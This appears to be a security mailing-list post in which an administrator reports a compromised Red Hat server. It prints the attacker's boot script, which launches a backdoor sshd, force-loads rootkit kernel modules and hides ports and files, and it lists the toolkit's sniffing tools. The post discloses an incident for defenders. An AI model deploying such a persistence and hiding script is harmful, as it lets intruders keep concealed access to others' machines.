Cracked. Possible(?) new rootkit ?

[maarten van den Berg <maarten () VBVB NL>]

Hi

Maybe I'm mistaken and this is old stuff, but...

I recently found a box which was obviously cracked, at least all the
evidence definitely points that way...:


After a (kernel-)upgrade, some service led to crashing the whole machine.
The service in question was called "system", and this is what
/etc/rc.d/rc3.d/S99system looks like:

_____ cut here ______
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.

/var/kerb/ssh.d > /dev/null 2> /dev/null

/sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null

/bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null

#exec redir
#/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd

/var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F92" > /dev/null 2> /dev/null

#/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null

/var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null

/var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null

/var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null

_____ cut here _____

Judging just from the file, an alternative sshd (ssh.d) is started, two
kernel-modules are inserted, a binary hides certain strings in something
network-related, and a binary 'hidef' hides everything including itself.

I have not had time yet to do any more research, but I bet it was just
pure luck that this toolkit didn't function well under a new kernel, thus
exposing itself...  I know what to do now, reinstall from scratch, but I
was wondering if this is interesting stuff for the list, or that it is
merely the Nth+1 crack of a Redhat box (not MY favorite flavour, btw) with
a well-known rootkit etc.

Oh, and by the way: Before discovery, I ran chkrootkit v 0.19, but that
didn't detect anything, running or otherwise.


Maarten


_____ Listing of /var/kerb/ _____


drwxr-xr-x root/ftp          0 2000-07-27 21:40:46 kerb/
drwxr-xr-x root/root         0 2000-07-12 03:43:50 kerb/s/
-rwxr-xr-x root/root    129076 2000-07-12 03:20:11 kerb/s/dsniff
-rwxr-xr-x root/root     20100 2000-07-12 03:20:16 kerb/s/arpredirect
-rw-r--r-- root/root      1009 2000-07-12 03:43:50 kerb/s/dsniff.services
-rwxr-xr-x root/root     93580 2000-07-12 03:26:17 kerb/s/urlsnarf
-rwxr-xr-x root/ftp      13468 2000-07-12 08:29:59 kerb/ered
-rwxr-xr-x root/ftp       3984 2000-07-12 08:29:59 kerb/hidef
-rw-r--r-- root/ftp        537 2000-07-12 08:29:59 kerb/k.a
-rwxr-xr-x root/ftp      35016 2000-07-12 08:29:59 kerb/l
-rwxr-xr-x root/ftp      13036 2000-07-12 08:29:59 kerb/nethide
-rwxr-xr-x root/ftp      27896 2000-07-12 08:29:59 kerb/p
-rwxr-xr-x root/ftp       8128 2000-07-12 08:29:59 kerb/pidof
-rw------- root/ftp        512 2001-02-14 16:01:40 kerb/sd.a
-rwxr-xr-x root/ftp     196408 2000-07-12 08:29:59 kerb/ssh.d
-rw-r--r-- root/ftp        960 2000-07-12 08:29:59 kerb/supermd.o
-rw-r--r-- root/ftp      12292 2000-07-12 08:29:59 kerb/supernw.o

_____ end of listing _____